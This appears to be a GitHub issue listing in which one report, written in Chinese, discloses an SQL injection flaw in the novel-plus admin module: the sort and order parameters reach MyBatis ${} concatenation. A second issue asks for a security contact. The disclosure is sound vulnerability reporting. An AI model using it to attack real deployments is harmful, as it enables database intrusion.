Results
2
issues of
haby0
novel-admin子模块存在SQL注入风险 用户请求:https://github.com/201206030/novel-plus/blob/4540c3781e9bc1d47c388cb8b6058ed66e094586/novel-admin/src/main/java/com/java2nb/novel/controller/BookController.java#L49 数据库查询:https://github.com/201206030/novel-plus/blob/4540c3781e9bc1d47c388cb8b6058ed66e094586/novel-admin/src/main/resources/mybatis/novel/BookMapper.xml#L48 用户可以控制sort和order变量,mybatis使用$时,会将用户输入拼接到sql语句中,造成SQL注入攻击.
What would be the right contact to report a security vulnerabilty? thanks!